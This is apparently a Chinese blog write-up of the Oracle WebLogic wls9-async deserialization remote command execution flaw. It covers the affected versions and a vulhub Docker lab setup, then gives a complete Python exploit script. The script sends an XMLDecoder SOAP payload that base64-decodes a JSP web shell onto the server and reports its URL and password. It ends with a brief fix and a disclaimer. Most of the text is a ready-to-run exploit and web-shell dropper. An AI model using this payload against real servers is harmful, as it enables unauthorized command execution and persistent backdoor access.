近日,国家信息安全漏洞共享平台(CNVD)收录了Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814)。部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。
WebLogic 10.X、WebLogic 12.1.3
使用vul的镜像
安装好docker 和docker-compose之后
直接在本地生成一个文件:
内容如下:
version: '2'
services:
weblogic:
image: vulhub/weblogic
ports:
- "7001:7001"
然后运行如命令:
docker-compose up -d
等待一段时间,访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。
对原理不是很懂
脚本小子只会基于已有的payload写工具
weblogic启动之后,访问
url+_async/AsyncResponseService
如果能正常访问 ,一般说明有漏洞
利用网络上的poc可以攻击成功
写一个脚本 完整利用。
import requests
import sys
def poc():
url =str(sys.argv[1])
path ="/_async/AsyncResponseService"
#AsyncResponseServiceHttps
#AsyncResponseServiceJms
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36",
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Content-Type': "text/xml"
}
payload = """
<?xml version="1.0" encoding="Utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.xmlDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo PCUKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiU+Cg==|base64 -d >servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>
"""
try:
request = requests.post(url+path,data=payload,headers=headers)
if request.status_code == 202:
print '[+] %s Exploit success!' % url
request2 = requests.get(url+'/_async/shell.jsp')
if request2.status_code == 200:
print '[+] Get shell: %s/_async/shell.jsp pass is cmd ' % url
else:
print '[-] Get shell fail '
else:
print '[-] %s Exploit failed!' % url
except:
print '[-] %s Address cannot connect!' % url
if __name__=='__main__':
poc()
攻击成功之后,可以获得一个shell GET 密码是cmd
删除该wls9_async_response.war包并重启webLogic
仅仅为了测试一个这个漏洞,不要有任何恶意行为,后果自负。